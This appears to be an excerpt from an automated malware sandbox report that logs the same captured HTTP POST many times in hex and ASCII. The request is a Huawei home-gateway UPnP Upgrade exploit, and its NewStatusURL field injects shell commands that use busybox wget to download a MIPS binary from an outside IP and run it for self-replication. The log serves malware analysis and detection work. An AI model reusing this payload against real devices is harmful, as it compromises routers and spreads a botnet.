6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 